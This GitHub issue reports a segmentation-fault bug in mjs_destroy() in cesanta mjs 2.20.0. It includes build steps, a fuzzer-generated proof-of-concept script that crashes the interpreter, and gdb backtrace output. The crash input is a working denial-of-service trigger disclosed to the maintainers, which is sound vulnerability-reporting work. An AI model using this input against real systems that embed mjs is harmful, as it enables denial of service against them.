Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SegFaultOnPc in mjs_destroy() at mjs.c:7563 #253

Open
vorfreuder opened this issue Nov 19, 2023 · 0 comments
Open

SegFaultOnPc in mjs_destroy() at mjs.c:7563 #253

vorfreuder opened this issue Nov 19, 2023 · 0 comments

Comments

@vorfreuder
Copy link

vorfreuder commented Nov 19, 2023
edited
Loading

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file.

Vulnerability Type
Segmentation fault on program counter

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -ggdb -O0 -DMJS_MAIN mjs.c -o mjs -ldl
poc 
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888    true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

gdb info

Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
7563      mbuf_free(&mjs->json_visited_stack);
(gdb) bt
#0  0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
#1  0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n  a let z = JSON.parse('\"\"');  // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, "    true,"..., generate_jsc=0, res=0x7ffd20341a58)
    at mjs.c:9044
#2  0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260, 
    path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1", 
    res=0x7ffd20341aa0) at mjs.c:9067
#3  0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406
(gdb) list
7558      mbuf_free(&mjs->owned_strings);
7559      mbuf_free(&mjs->foreign_strings);
7560      mbuf_free(&mjs->owned_values);
7561      mbuf_free(&mjs->scopes);
7562      mbuf_free(&mjs->loop_addresses);
7563      mbuf_free(&mjs->json_visited_stack);
7564      free(mjs->error_msg);
7565      free(mjs->stack_trace);
7566      mjs_ffi_args_free_list(mjs);
7567      gc_arena_destroy(mjs, &mjs->object_arena);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@vorfreuder